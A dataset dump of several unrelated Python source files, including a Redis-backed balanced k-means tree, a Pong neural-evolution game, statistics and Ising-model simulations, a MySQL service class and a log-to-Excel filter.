str(node.cluster_id))\n total_sum = data.sum(axis = 0)\n total_size = len(data)\n\n node.centriod = total_sum / total_size\n\n return (total_sum, total_size)\n\n cluster_list = []\n for child in node.children:\n cluster_list.append(self.update_centroid(child))\n\n total_sum = np.zeros(shape = (cluster_list[0][0].shape[0], ))\n total_size = 0\n\n for sum, size in cluster_list:\n total_sum += sum\n total_size += size\n\n node.centriod = total_sum / total_size\n\n return (total_sum, total_size)\n\n\n @classmethod\n def loads(cls, bkt_key, redis_host, redis_port = 6379):\n\n redis = RedisDBWrapper(redis_host, redis_port)\n\n trees = redis.getHandler().smembers('my_bkt')\n found = False\n\n for tree in trees:\n if bkt_key == tree.split('_')[1]:\n\n _, bkt_key, max_clusters_per_run, \\\n max_depth, min_cluster_size, max_cluster_size, balance, root_id = tree.split('_')\n\n found = True\n break\n\n if not found:\n return None\n\n bkt = BKTree(int(max_clusters_per_run), int(max_depth), int(min_cluster_size), \\\n None, redis_host, redis_port, int(max_cluster_size), bool(balance))\n\n bkt.__bkt_key = bkt_key\n bkt.__redis = redis\n bkt.__root_node.id = root_id\n\n try:\n q = queue.Queue()\n q.put(bkt.__root_node)\n\n while not q.empty():\n node = q.get()\n\n if not node.leaf:\n children_ids = bkt.get_redis().smembers(bkt.__bkt_key + '_' + node.id + '_children')\n else:\n data = bkt.__redis.get_data(bkt.__bkt_key + '_' + node.parent.id + '_' + str(node.cluster_id))\n\n node.centriod = data.sum(axis = 0) / len(data)\n children_ids = []\n\n\n for child_id in children_ids:\n child_info = bkt.get_redis().get(bkt.__bkt_key + '_' + child_id)\n\n child_node = BKTNode()\n child_node.id = child_id\n\n child_node.leaf = True if child_info.split('_')[0] == '1' else False\n child_node.cluster_id = int(child_info.split('_')[1])\n child_node.parent = node\n\n q.put(child_node)\n\n node.children.append(child_node)\n\n bkt.update_centroid(bkt.__root_node)\n\n return bkt\n\n except Exception as e:\n print(e)\n return None\n\n\n\n def __get_nearest_cluster(self, point, node, leaf_clusters):\n\n if node.leaf:\n leaf_clusters.append((node, np.sqrt(((point - node.centriod) ** 2).sum())))\n\n for child in node.children:\n self.__get_nearest_cluster(point, child, leaf_clusters)\n\n #返回与指定的数据点最接近的簇所对应的节点\n #参数 point: 要检索的数据点\n def get_nearest_leaf_node(self, point):\n\n leaf_clusters = []\n\n for child in self.__root_node.children:\n self.__get_nearest_cluster(point, child, leaf_clusters)\n\n if len(leaf_clusters) == 0:\n return None\n\n leaf_clusters = sorted(leaf_clusters, key = lambda x: x[1])\n\n return leaf_clusters[0][0]\n\n #获取与指定的数据点最接近的簇数据\n #参数 point: 要检索的数据点\n def get_nearest_cluster(self, point):\n\n node = self.get_nearest_leaf_node(point)\n if node:\n return node.get_data(self.__redis, self.__bkt_key)\n\n return None\n\n #构建balanced k-means tree\n #参数 data: numpy array类型的数据集\n def build(self, data):\n size = len(data)\n if size == 0:\n return self.__root_node\n\n max_cluster_size = max(self.__min_cluster_size * 2, self.__max_cluster_size)\n\n if size <= max_cluster_size:\n cur_node = BKTNode()\n cur_node.parent = self.__root_node\n cur_node.centriod = data.sum(axis = 0) / len(data)\n cur_node.cluster_id = 0\n\n self.__redis.save_data(data, self.__bkt_key + '_' + self.__root_node.id + \"_\" + str(cur_node.cluster_id))\n self.__root_node.children.append(cur_node)\n\n return self.__root_node\n\n k = min(size / max_cluster_size + 1, self.__max_clusters_per_run)\n\n clusters = FastKmeans.fit(data, k, self.__redis_host, self.__redis_port, self.__sc, self.__bkt_key + '_' + self.__root_node.id)\n\n for cid, centriod, _, ret in clusters:\n if not ret:\n print(\"Failed to build BKT due to redis write error\")\n return None\n\n child_node = self.make_bkt_node(cid, centriod, self.__root_node)\n if not child_node:\n print(\"Failed to build BKT\")\n return None\n\n self.__root_node.children.append(child_node)\n\n self.adjust_tree_depth()\n\n self.update_centroid(self.__root_node)\n\n return self.__root_node\n\n #构建balanced k-means tree的节点\n #参数 centriod_id: 该节点所对应的簇id\n #参数 centriod: 该节点所对应的簇中心\n #参数 parent_node: 该节点的父节点\n def make_bkt_node(self, cluster_id, centriod, parent_node):\n\n cur_node = BKTNode()\n cur_node.parent = parent_node\n cur_node.centriod = centriod\n cur_node.cluster_id = cluster_id\n\n #读取该节点所对应簇的数据\n data = self.__redis.get_data(self.__bkt_key + '_' + parent_node.id + '_' + str(cluster_id))\n\n size = len(data)\n max_cluster_size = max(self.__min_cluster_size * 2, self.__max_cluster_size)\n\n #如果该节点所对应簇的数据量小于max_cluster_size,则完成一个叶子节点\n if size <= max_cluster_size:\n cur_node.leaf = True\n return cur_node\n\n #计算该节点中的数据还可以分成几个簇,如果只能分成2个簇,则做均分处理,否则进行一轮K-means聚类\n k = min(int(size / max_cluster_size + 1), self.__max_clusters_per_run)\n\n if self.__balance:\n if k == 2:\n clusters = self.half_cut_cluster(data, self.__bkt_key + '_' + cur_node.id)\n else:\n clusters = FastKmeans.fit(data, k, self.__redis_host, self.__redis_port, self.__sc, self.__bkt_key + '_' + cur_node.id)\n else:\n clusters = FastKmeans.fit(data, k, self.__redis_host, self.__redis_port, self.__sc, self.__bkt_key + '_' + cur_node.id)\n\n if False in [ret for _, _, _, ret in clusters]:\n print(\"Failed to build BKT due to redis write error\")\n return None\n\n #检查K-means聚类所产生的簇,将小于min_cluster_size的簇归并起来\n if k > 2 and self.__balance:\n clusters = self.merge_small_clusters(clusters, cur_node)\n\n #对聚类所形成的新簇递归构建子树\n for cid, centriod, _, _ in clusters:\n child_node = self.make_bkt_node(cid, centriod, cur_node)\n if not child_node:\n return None\n\n cur_node.children.append(child_node)\n\n return cur_node\n\n #将数据切分成大小相等的两个簇\n def half_cut_cluster(self, data, cluster_key, cluster_ids = ()):\n\n clusters = []\n if len(cluster_ids) == 0:\n first_id = 0\n second_id = 1\n else:\n first_id, second_id = cluster_ids\n\n data_len = int(len(data) / 2)\n\n ret = self.__redis.save_data(data[:data_len], cluster_key + \"_\" + str(first_id))\n cluster = (first_id, data[:data_len].sum(axis = 0) / data_len, data_len, ret)\n clusters.append(cluster)\n\n data_len = len(data) - int(len(data) / 2)\n ret = self.__redis.save_data(data[int(len(data) / 2):], cluster_key + \"_\" + str(second_id))\n cluster = (second_id, data[int(len(data) / 2):].sum(axis = 0) / data_len, data_len, ret)\n clusters.append(cluster)\n\n return clusters\n\n #检查K-means聚类所产生的簇,将小于min_cluster_size的簇归并起来\n def merge_small_clusters(self, clusters, parent_node):\n\n clusters = sorted(clusters, key = lambda x: x[2])\n to_merges = []\n\n for i, cluster in enumerate(clusters):\n if cluster[2] < self.__min_cluster_size:\n to_merges.append((cluster[0], cluster[2]))\n else:\n clusters = clusters[i:]\n break\n\n max_cluster_size = max(self.__min_cluster_size * 2, self.__max_cluster_size)\n\n if len(to_merges) == 0:\n return clusters\n\n if len(to_merges) == len(clusters):\n clusters = []\n new_cid = max([cluster[0] for cluster in to_merges]) + 1\n else:\n new_cid = max([cluster[0] for cluster in clusters]) + 1\n\n i = 0\n new_clusters = []\n\n while i < len(to_merges):\n\n merged_data = np.zeros(shape = (1, parent_node.centriod.shape[0]))\n\n size = 0\n\n while i < len(to_merges) and size + to_merges[i][1] <= max_cluster_size:\n\n data = self.__redis.get_data(self.__bkt_key + '_' + parent_node.id + '_' + str(to_merges[i][0]))\n\n merged_data = np.concatenate((merged_data, data), axis = 0)\n\n size += to_merges[i][1]\n\n i += 1\n\n if size >= self.__min_cluster_size and size <= max_cluster_size:\n\n merged_data = merged_data[1:]\n ret = self.__redis.save_data(merged_data, self.__bkt_key + '_' + parent_node.id + '_' + str(new_cid))\n\n new_cluster = (new_cid, merged_data.sum(axis = 0) / len(merged_data), len(merged_data), ret)\n new_clusters.append(new_cluster)\n\n #如果就剩下最后一个小簇,那么表示在它前面的小簇都合并完了,并且合并后的大小小于max_cluster_size,那么就把这最后一个小簇也合并掉,\n #这样这个簇大小肯定超过max_cluster_size了,可以继续在下次迭代中分裂。\n if i == len(to_merges) - 1:\n\n data = self.__redis.get_data(self.__bkt_key + '_' + parent_node.id + '_' + str(to_merges[i][0]))\n\n merged_data = np.concatenate((merged_data, data), axis = 0)\n ret = self.__redis.save_data(merged_data, \\\n self.__bkt_key + '_' + parent_node.id + '_' + str(new_cid))\n\n new_cluster = (new_cid, merged_data.sum(axis = 0) / len(merged_data), len(merged_data), ret)\n new_clusters[len(new_clusters) - 1] = new_cluster\n break\n\n #如果小簇合并后还是小于min_cluster_size,那么就和第一个大簇合并,并且将合并之后的簇再对半切成两个均等的簇,继续在下次迭代中分裂。\n #在这一步中,如果不做对半切,算法可能永远无法收敛\n if size < self.__min_cluster_size and len(clusters) > 0:\n\n data = self.__redis.get_data(self.__bkt_key + '_' + parent_node.id + '_' + str(clusters[0][0]))\n merged_data = np.concatenate((merged_data, data), axis = 0)\n\n new_clusters.extend(self.half_cut_cluster(merged_data[1:], self.__bkt_key + '_' + parent_node.id, (new_cid, new_cid + 1)))\n new_cid += 1\n clusters = clusters[1:]\n break\n\n new_cid += 1\n\n new_clusters.extend(clusters)\n\n return new_clusters\n\n #获取指定节点的子树高度\n def get_tree_depth(self, node):\n\n if len(node.children) == 0:\n return 0\n\n depths = []\n for child in node.children:\n depths.append(self.get_tree_depth(child) + 1)\n\n return max(depths)\n\n #调整指定节点下的子树高度\n def __adjust_tree_depth(self, node):\n\n if len(node.children) == 0:\n return\n\n all_leaf_childs = np.array([child.leaf for child in node.children]).all()\n\n if not all_leaf_childs:\n children = node.children\n\n for child in children:\n if not child.leaf:\n self.__adjust_tree_depth(child)\n\n if len(children) != len(node.children):\n merged_data = np.zeros(shape = (1, node.centriod.shape[0]))\n\n for child in node.children:\n data = self.__redis.get_data(self.__bkt_key + '_' + node.id + '_' + str(child.cluster_id))\n\n merged_data = np.concatenate((merged_data, data), axis = 0)\n\n node.centriod = merged_data.sum(axis = 0) / (len(merged_data) - 1)\n\n return\n\n parent_cluster_ids = [child.cluster_id for child in node.parent.children]\n new_cluster_id = max(parent_cluster_ids) + 1\n\n for child in node.children:\n data = self.__redis.get_data(self.__bkt_key + '_' + node.id + '_' + str(child.cluster_id))\n if data is None:\n print(self.__bkt_key + '_' + node.id + '_' + str(child.cluster_id))\n\n self.__redis.save_data(data, self.__bkt_key + '_' + node.parent.id + '_' + str(new_cluster_id))\n\n child.cluster_id = new_cluster_id\n child.parent = node.parent\n\n node.parent.children.append(child)\n\n new_cluster_id += 1\n\n node.parent.children.remove(node)\n\n #调整树高度\n def adjust_tree_depth(self):\n\n while self.get_tree_depth(self.__root_node) > self.__max_depth:\n self.__adjust_tree_depth(self.__root_node)\n","sub_path":"balanced_kmeans_tree/bk_tree.py","file_name":"bk_tree.py","file_ext":"py","file_size_in_byte":18256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"153552457","text":"import os\nimport sys\nimport neat\nimport random\nimport datetime\nimport argparse\nimport numpy as np\nfrom tqdm import tqdm\n\nwin_width = 400\nwin_height = 400\n\np_width = 20\np_height = 90\n\nball_radius = 5\nball_v_limit = 3\n\nlimit_pv = 3\nlimit_p2_up = 3\nlimit_p2_down = 2\n\n\ndef move_player(player,v,min_lim,max_lim):\n y = player[1] + v\n y = max(y,min_lim)\n y = min(y,max_lim)\n return [player[0],y]\n\ndef v_pc_player(pc_center,ball,v_limits):\n if pc_center < ball[1]:\n return v_limits[1]\n elif pc_center > ball[1]:\n return -v_limits[0]\n else:\n return 0\n\ndef move_ball(posx,posy,vx,vy):\n return (posx+vx,posy+vy)\n\ndef evaluate_net(net,show_game=False,n_loops=3):\n total_score = 0\n if show_game:\n import pong_pygame\n for iloop in range(n_loops):\n total_score += pong_pygame.net_play(net,show_game)\n else:\n for iloop in range(n_loops):\n total_score += net_play(net)\n return total_score/n_loops\n\ndef net_play(net):\n\n p1 = [p_width/2,win_height/2-p_height/2]\n p2 = [win_width-3*p_width/2,win_height/2-p_height/2]\n p1_v = 0\n p2_v = 0\n\n ball = [int(win_width/4),int(win_height/2)]\n\n ball_vx = 1 \n ball_vy = random.sample([-1,0,1],1)[0]\n\n n_balls_touch = 0\n n_walks = 0\n zero_v_plays = 0\n \n winner = False\n run = True\n while run:\n\n pl_input = np.array([p1[1],ball[0],ball[1],ball_vx,ball_vy,p2[1]])\n #player_vertical_position = p1[1]\n #ball_horizontal_posiiton = ball[0]\n #ball_vertical_position = ball[1]\n #ball_horizontal_velocity = ball_vx\n #ball_vartical_velocity = ball_vy\n #oponent_vertical_position = p2[1]\n\n #output = np.array(net.activate(tuple(input)))\n pl_input = np.array([pl_input])\n output = net.activate(pl_input).numpy()\n move = np.argmax(output[0])\n\n if move == 1:\n p1_v = -limit_pv\n elif move == 2:\n p1_v = limit_pv\n \n # Conta numero de passos do player 1\n n_walks += abs(p1_v)\n\n p1 = move_player(p1,p1_v,0,win_height-p_height)\n\n # p2 acompanha a bola se ela está na metade dele da tela\n if ball[0] >= win_width/2:\n p2_v = v_pc_player(p2[1]+p_height/2,ball,(limit_p2_up,limit_p2_down))\n else:\n p2_v = 0\n p2 = move_player(p2,p2_v,0,win_height-p_height)\n \n ball = move_ball(ball[0],ball[1],ball_vx,ball_vy)\n\n # Bola bate no player 1\n if ball[0] <= p1[0] + p_width:\n\n # Contar vezes que os players jogaram parados\n if p1_v == p2_v == 0:\n zero_v_plays += 1\n\n if p1[1] <= ball[1] <= p1[1]+p_height:\n ball_vx = -ball_vx\n # Mudar a velocidade vertical da bola\n if p1_v != 0:\n iball_vy = ball_vy+abs(p1_v)/p1_v\n if iball_vy >= 0:\n ball_vy = int(min(iball_vy,ball_v_limit))\n else:\n ball_vy = int(max(iball_vy,-ball_v_limit))\n #ball_vy = min(ball_vy+p1_v,ball_v_limit)\n n_balls_touch += 1\n else:\n run = False\n # Bola bate no player 2\n elif ball[0] >= p2[0]:\n if p2[1] <= ball[1] <= p2[1]+p_height:\n ball_vx = -ball_vx\n # Mudar a velocidade vertical da bola\n if p2_v != 0:\n iball_vy = ball_vy+abs(p2_v)/p2_v\n if iball_vy >= 0:\n ball_vy = int(min(iball_vy,ball_v_limit))\n else:\n ball_vy = int(max(iball_vy,-ball_v_limit))\n #ball_vy = min(ball_vy+p1_v,ball_v_limit)\n else:\n run = False\n winner = True\n \n # Bola bater nas paredes verticais\n if ball[1] >= win_height or ball[1] <= 0:\n ball_vy = -ball_vy\n\n # Punir jogos longos parados\n if n_balls_touch >= 3:\n if zero_v_plays == n_balls_touch:\n run = False\n n_balls_touch = 0\n p1[1] = win_height*2\n\n # Impedir jogos inifinitos\n if n_balls_touch >= 50:\n run = False\n winner = False\n\n score = n_balls_touch\n\n # winner, score, i_distance_to_ball\n winn = 1 if winner else 0\n i_distance_to_ball = 0 if winner else (win_height - abs((p1[1]+p_height/2)-ball[1]))\n\n #print([winn, score, i_distance_to_ball])\n return (10**2)*winn + score","sub_path":"tensorflow-neat/Pong/pong_game.py","file_name":"pong_game.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"64815156","text":"from __future__ import division\nfrom __future__ import print_function\nimport numpy as np\nimport csv\nfrom sklearn.linear_model import Lasso\nfrom random import randint\nfrom collections import defaultdict\nfrom imputation import ImputationMissingData\nfrom data import DataMatrix, DiagonalData\nfrom math import e\n\nif __name__ == '__main__':\n # Set the parameters\n # Set the parameters\n n = 100 \n p = 20 \n sigma = 0 # additive noise\n sparse = True\n s = int(np.sqrt(p)) + 1 # square root sparsity\n\n if sparse:\n # Square root sparsity\n beta0 = np.zeros(p)\n for i in range(s):\n beta0[i] = 1/np.sqrt(s)\n else: \n beta0 = np.ones(p)\n \n # Run a simulation\n num_trials = 1 \n alpha_list = np.linspace(0.5, 0.99, 5)\n error_vals, max_error_vals, min_error_vals = [], [], [] \n for alpha in alpha_list:\n avg_error, max_error, min_error = 0, 0, 10000\n for i in range(num_trials):\n diag_dict = {'diagonal': np.ones(p)\\\n , 'n': n\\\n , 'p': p}\n simple_gaussian = DiagonalData(diag_dict)\n\n imputation_dict = {'sparse': sparse\\\n , 'beta0': beta0\\\n , 'sigma': sigma\\\n , 'data': simple_gaussian\\\n , 'alpha': alpha\\\n , 'lambda': np.sqrt(alpha * (1 - alpha)) * np.sqrt(np.log(p)/n)}\n imputation_test = ImputationMissingData(imputation_dict)\n\n error = imputation_test.get_l2_error()\n avg_error += error\n if error > max_error:\n max_error = error\n if error < min_error:\n min_error = error\n avg_error = avg_error/num_trials\n\n error_vals.append(avg_error)\n max_error_vals.append(max_error)\n min_error_vals.append(min_error)\n\n data = np.array([alpha_list, error_vals, min_error_vals,max_error_vals]).transpose()\n print(data.shape)\n\n np.savetxt('IdentityGaussianBig.dat', data, \\\n fmt=['%.2f', '%.4f', '%.6f', '%.8f'], \\\n header='alpha err min_err max_err', \\\n comments='# ')\n","sub_path":"simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"39078837","text":"\"\"\"\r\nBall Class\r\n\"\"\"\r\nfrom random import Random\r\nimport math\r\nimport pygame\r\nfrom CONSTANTS import *\r\nfrom genes import Genes\r\nfrom myvector import myvector\r\n\r\nRADIUS = 10\r\n\r\nclass Ball:\r\n\tdef __init__(self):\r\n\t\tself.genes = Genes(1000)\r\n\t\tself.pos = myvector(70, HEIGHT/2)\r\n\t\tself.vel = myvector(0, 0)\r\n\t\tself.acc = myvector(0, 0)\r\n\r\n\t\tself.dead = False\r\n\t\tself.reached_goal = False\r\n\t\tself.is_best = False\r\n\t\tself.fitness = 0\r\n\r\n\t\tself.color = (255, 0, 102)\r\n\t\tself.fitness = 0\r\n\r\n\r\n\r\n\tdef draw(self, WIN):\r\n\t\tif self.is_best:\r\n\t\t\tpygame.draw.circle(WIN, BEST_BALL, (self.pos.x, self.pos.y), RADIUS)\r\n\t\telse:\r\n\t\t\tpygame.draw.circle(WIN, self.color, (self.pos.x, self.pos.y), RADIUS)\r\n\r\n\r\n\tdef move(self):\r\n\t\tif self.genes.step < self.genes.size:\r\n\t\t\tacc = self.genes.vectors[self.genes.step]\r\n\t\t\tself.genes.step += 1\r\n\t\t\tself.vel.add(acc)\r\n\t\t\tself.vel.limitVelocity(4)\r\n\t\t\tself.pos.add(self.vel)\r\n\t\telse:\r\n\t\t\tself.dead = True\r\n\r\n\tdef update(self):\r\n\t\tif (not self.reached_goal) and (not self.dead):\r\n\t\t\tself.move()\r\n\t\tif not self.is_inside():\r\n\t\t\tself.dead = True\r\n\t\telif self.calculateDistancetoGoal() < 10:\r\n\t\t\tself.reached_goal = True\r\n\r\n\r\n\r\n\tdef is_inside(self) -> bool:\r\n\t\tif self.pos.x < 0 or self.pos.x > WIDHT or self.pos.y < 0 or self.pos.y > HEIGHT:\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef calculateDistancetoGoal(self):\r\n\t\treturn math.dist([self.pos.x, self.pos.y], [GOAL_X, GOAL_Y])\r\n\t\r\n\tdef calculateFitness(self):\r\n\t\tif self.reached_goal:\r\n\t\t\tself.fitness = 1/15 + 10000/(self.genes.step * self.genes.step)\r\n\t\telse:\r\n\t\t\tdist = self.calculateDistancetoGoal()\r\n\t\t\tself.fitness = 1/(dist**2)\r\n\r\n\tdef haveBaby(self):\r\n\t\tbaby = Ball()\r\n\t\tbaby.genes = self.genes.copy()\r\n\t\treturn baby\r\n","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"405200103","text":"import os\nimport openpyxl\nimport test\npath=os.getcwd()\nnew_path=path+'\\log'\nbook={}\n\nnamefile=open('FE-4KB.txt')\n# log_name='2018-12-12(综合电检设备).log'\nlog_name=input('输入log文件路径=')\n# log_filename=log_name\n# log_excel_name=log_name+'.xlsx'\n\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Font, Color\nfrom openpyxl.styles import colors\n#\n# ft=Font(color=colors.RED)\n#\nwb=Workbook()\n# i=1\nfor nameline in namefile.readlines():\n if nameline.find('0x')>-1:\n ECU_name=nameline[:nameline.index('\\t')]\n Req_ID=nameline[nameline.index('0x')+2:nameline.index('0x')+5]\n Res_ID = nameline[nameline.index('0x') + 7:nameline.index('0x') + 10]\n print(ECU_name+Req_ID+Res_ID)\n log_file=open(log_name)\n# # log_file = open('log_VF11.txt')\n# log type: $07,$E4,$0C,$00,$00,$07,$EC\n KB_ID='$0'+Req_ID[0:1]+','+'$'+Req_ID[1:3]+',$0C,$00,$00,'+'$0'+Res_ID[0:1]+','+'$'+Res_ID[1:3]\n print('KB_ID=',KB_ID)\n book[KB_ID]=ECU_name\n\n\n#\n sheet = wb.create_sheet()\n# # i=i+1\n sheet.title = ECU_name\n#\n# print(book.keys())\n# print(book.values())\n\nfor line in log_file.readlines():\n for ID in book.keys():\n if line.find(ID)>=0:\n # print(line)\n sheet=wb[book[ID]]\n sheet.cell(sheet.max_row+1,1,line)\n\n\n\n\n# for ws in wb:\n# if ws.cell(2,1).value==None:\n# wb.remove(ws)\nwb.save('result.xlsx')\nprint('book=',book)\nresult_file=log_name.replace('.','')+'.xlsx'\nwb.save(result_file)\n\n\n\n","sub_path":"Project/FE-4KB(BeiLun)/FE-4KB log.py","file_name":"FE-4KB log.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"604149287","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = 'Liaoxiaoli'\nfrom models.dbDriver import MySqlDriver\nfrom models.caseService import CaseService\nimport logging\nimport time\n\nclass BasessService:\n def __init__(self):\n self.service = MySqlDriver()\n self.case = CaseService()\n self.table = \"busess\"\n\n def add(self, proj_id,bus_desc,creater,case_arry):\n add_item = \"(proj_id,bus_desc,creater,case_arry)\"\n add_value = (proj_id,bus_desc,creater,case_arry)\n try:\n result = self.service.insert(self.table,add_item,add_value)\n except Exception as e:\n logging.error(e)\n result = -1\n return result\n\n def update_byid(self,bus_id,proj_id,creater,bus_desc):#根据bus_id更新\n condition = \"bus_id=%d\" % bus_id\n update_value = \"proj_id=%d,creater='%s',bus_desc='%s'\" % (proj_id,creater,bus_desc)\n try:\n result = self.service.update(self.table, condition, update_value)\n except Exception:\n result = -1\n return result\n\n def update_cases_byid(self,bus_id,case_arry):#根据bus_id更新用例列表\n condition = \"bus_id=%d\" % bus_id\n update_value = \"case_arry='%s'\" % (case_arry)\n try:\n result = self.service.update(self.table, condition, update_value)\n except Exception:\n result = -1\n return result\n\n def delete_byid(self, bus_id):\n condition = \"bus_id=%d\" % bus_id\n try:\n self.result_num = self.service.delete(self.table, condition)\n except Exception:\n self.result_num = -1\n return self.result_num\n\n def list_by_projid(self, proj_id, pagenow=1, pagesize=10):\n condition = \"proj_id=%d\" % proj_id\n try:\n results = self.service.query_byitem(self.table,condition,\"bus_id\",pagenow, pagesize)\n except Exception:\n results = -1\n return results\n\n def list_all(self, pagenow=1, pageSize=10): # 获取指定表中所有线数据的list,并分页显示\n try:\n results = self.service.query_byitem(self.table,\"1=1\", \"bus_id\", pagenow, pageSize)\n except Exception:\n results = -1\n return results\n\n def list_case_bybusid(self,bus_id):\n sql_req = \"select case_arry from busess where bus_id =%d\"%bus_id\n try:\n tmp = self.service.exe_query(sql_req)\n results = self.case.list_req_caseid(tmp[0][0])\n except Exception as e:\n results = -1\n return results\n\n def get_bybusid(self,bus_id):\n sql_req = \"select bus_id,proj_id,bus_desc,creater from busess where bus_id =%d\"%bus_id\n try:\n results = self.service.exe_query(sql_req)\n # results = self.case.list_req_caseid(tmp[0][0])\n except Exception as e:\n results = -1\n return results\n\n def detail_bybusid(self,bus_id):\n sql_req = \"select * from busess where bus_id =%d\"%bus_id\n try:\n detail = self.service.exe_query(sql_req)[0]\n caseids = detail[3].strip(\"(\").strip(\")\").split(\",\")\n cases = []\n for caseid in caseids:\n case = self.case.list_req_caseid((caseid,))\n if case == -1 or len(case) == 0:\n continue\n cases.append(case[0])\n # cases = self.case.list_req_caseid(detail[3])\n if cases == -1 or len(cases) == 0:\n cases = ()\n except Exception as e:\n return -1\n return detail, cases","sub_path":"models/busessService.py","file_name":"busessService.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"591563484","text":"#model importing from csv file\nimport os\nimport csv\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nengine = create_engine(os.getenv(\"DATABASE_URL\")) # database engine object from SQLAlchemy that manages connections to the database\n # DATABASE_URL is an environment variable that indicates where the database lives\ndb = scoped_session(sessionmaker(bind=engine)) # create a 'scoped session' that ensures different users' interactions with the \n\ntable_name=\"books\"\n\n\n\nfile = open(\"books.csv\")\nreader = csv.reader(file)\nnext(reader)\nfor isbn, title, author, year in reader:\n\n db.execute(f\"INSERT INTO {table_name} (isbn, title, author, year) VALUES(:isbn, :title, :author, :year)\",\n {'isbn': isbn, 'title': title, 'author': author, 'year': year})\n\n print(f\"Added book: {isbn}, {title}, {author}, {year}\")\ndb.commit()\n","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"452498572","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef init_state(size):\n\tstate = np.zeros((size, size))\n\tfor i in range(size):\n\t\tfor j in range(size):\n\t\t\tif np.random.rand() > 0.5:\n\t\t\t\tstate[i][j] = 1\n\t\t\telse:\n\t\t\t\tstate[i][j] = -1\n\treturn state\n\ndef ising_energy(state, J):\n\tsize = len(state)\n\tE = 0\n\tfor i in range(len(state)):\n\t\tfor j in range(len(state)):\n\t\t\tE -= J* state[i][j]*sum_neighbors(state, i, j)\n\treturn E\n\ndef sum_neighbors(state, i, j):\n\tsize = len(state)\n\tleft_neighbor = state[(i-1) %size][j]\n\tright_neighbor = state[(i+1)% size][j]\n\tup_neighbor = state[i][(j-1)% size]\n\tdown_neighbor = state[i][(j-1)%size]\n\n\treturn left_neighbor+right_neighbor+down_neighbor+up_neighbor\n\ndef metropolis(state, kT, J):\n size = len(state)\n iterations = 1000\n\n for i in range(iterations):\n for j in range(size**2):\n row = int(np.random.random()*size)\n col = int(np.random.random()*size)\n\n spin = state[row, col]\n neighbor = sum_neighbors(state, row, col)\n\n dE = 2 * J * spin * neighbor\n\n prob = np.exp(-dE/kT)\n\n if dE <=0 or np.random.random() <=prob:\n state[row, col] = - state[row, col]\n return state\n\n\n# MAKE NN DATA\n\n## ORDERED ISING STATES\n\nordered = []\nlow_temps = np.linspace(0.1, 1.8, 10)\nwhile len(ordered) < 500:\n for t in low_temps:\n state = init_state(8)\n state = metropolis(state, t, 1)\n ordered.append(state)\nprint('Done with ordered')\n\n## DISORDERED ISING STATES\n\ndisordered = []\nhigh_temps = np.linspace(2.6, 4, 10)\nwhile len(disordered) < 500:\n for t in high_temps:\n state = init_state(8)\n state = metropolis(state, t, 1)\n disordered.append(state)\nprint('Done with disordered')\n# 0 will represnt an ordered state and 1 will represent a disordered state\n\ndata = []\nanswers = []\nN = len(disordered)\nfor i in range(N):\n if np.random.rand() > 0.5:\n data.append(disordered[i])\n answers.append(1)\n else:\n data.append(ordered[i])\n answers.append(0)\nprint('Made DATA')\n\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\n\nx_train = np.array(data[:400])\nx_train = x_train.reshape(400, 8, 8, 1)\nx_test = np.array(data[400:])\nx_test = x_test.reshape(100, 8, 8, 1)\n\nnum_classes = 2\ny_train = np.array(answers[:400])\ny_test = np.array(answers[400:])\n\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\ndef Model(x_train, y_train, x_test, y_test, epochs):\n batch_size = 128\n epochs = epochs\n num_classes = 2\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(2,2), activation = 'relu', input_shape= (8,8,1)))\n model.add(Flatten())\n model.add(Dense(num_classes, activation = 'softmax'))\n model.compile(loss= keras.losses.categorical_crossentropy,\n optimizer = keras.optimizers.Adadelta(),\n metrics = ['accuracy'])\n history = model.fit(x_train, y_train,\n batch_size= batch_size,\n epochs = epochs,\n verbose = 1, validation_data = (x_test, y_test))\n return model, history\n\n\nmodel, history = Model(x_train, y_train, x_test, y_test, 100)\n\nfig, ax = plt.subplots(1,2, figsize = (7,5))\n#ax[0].set_aspect('auto')\nax[0].plot(history.history['acc'], linewidth = 2, linestyle = '--', label = 'Train')\nax[0].plot(history.history['val_acc'],linewidth = 2, linestyle = '--', label = 'Test')\nax[0].set_title('NN Accuracy')\nax[0].set_xlabel('Epoch')\nax[0].set_ylabel('Accuracy')\nax[0].legend(loc = 'best')\n#ax[1].set_aspect('auto')\nax[1].plot(history.history['loss'], linewidth = 2, linestyle = '--', label = 'Train')\nax[1].plot(history.history['val_loss'],linewidth = 2, linestyle = '--', label = 'Test')\nax[1].set_title('NN Loss')\nax[1].set_xlabel('Epoch')\nax[1].set_ylabel('Loss')\nax[1].legend(loc = 'best')\nfig.subplots_adjust(right = 2)\nplt.savefig('cnn_training.png', bbox_inches = 'tight')\nplt.show()\n","sub_path":"Ising Model/src/2d IsingModel/neural net/ising_nn.py","file_name":"ising_nn.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 